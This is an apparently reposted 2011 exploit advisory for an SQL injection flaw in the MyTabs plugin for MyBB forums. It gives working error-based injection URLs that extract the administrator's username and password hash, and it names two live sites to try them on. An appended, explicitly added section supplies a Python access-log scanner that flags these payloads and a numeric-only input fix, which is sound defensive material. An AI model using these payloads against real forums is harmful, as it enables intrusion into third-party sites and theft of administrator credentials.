MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
Tuesday, 18 October 2011
=====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home :
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid :D !
Vulnerability :
$~ http://localhost/myb.../index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)-- -
You can try on this site
http://secworm.net/forums/index.php?tab=1'
http://icanhazcookie.net/index.php?tab=1'
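Added example (not part of the original advisory or the plugin's code): a Python check for web server access logs that flags index.php requests whose tab parameter is not a plain number, and labels those carrying the markers of the error-based queries shown above. The log lines, the /forum/ path and the function names are constructed for illustration, and it assumes legitimate tab values are numeric ids, as the tab=1 in the advisory's URLs suggests.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers of the duplicate-key error technique used in the advisory's URLs.
ERROR_BASED = re.compile(r"floor\s*\(\s*rand\s*\(|information_schema|group\s+by", re.I)

def classify_tab(value):
    """Return None for a plain numeric tab id, otherwise a finding label."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if ERROR_BASED.search(value):
        return "error-based-sqli"
    return "non-numeric-tab"

def scan(log_text):
    """Return a list of (client_ip, label, decoded_value) for suspicious tab= requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs URL-decodes the value, so %27 and %20 are seen as ' and space.
        for value in parse_qs(url.query, keep_blank_values=True).get("tab", []):
            label = classify_tab(value)
            if label:
                findings.append((ip, label, value))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [01/Aug/2011:10:00:01 +0000] "GET /forum/index.php?tab=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2011:10:00:07 +0000] "GET /forum/index.php?tab=1%27 HTTP/1.1" 503 912',
    '203.0.113.9 - - [01/Aug/2011:10:00:09 +0000] "GET /forum/index.php?tab=1%27%20and(select%201%20from(select%20count(*),concat((select%20username%20from%20mybb_users%20where%20uid=1),floor(Rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)--%20- HTTP/1.1" 503 1340',
    '198.51.100.7 - - [01/Aug/2011:10:01:00 +0000] "GET /forum/showthread.php?tid=4 HTTP/1.1" 200 8801',
])

if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(ip, label, value[:60])
```

The same numeric-only rule is what the plugin's input handling needs: a tab value that is cast to an integer before it reaches the query cannot carry the quote that starts these requests.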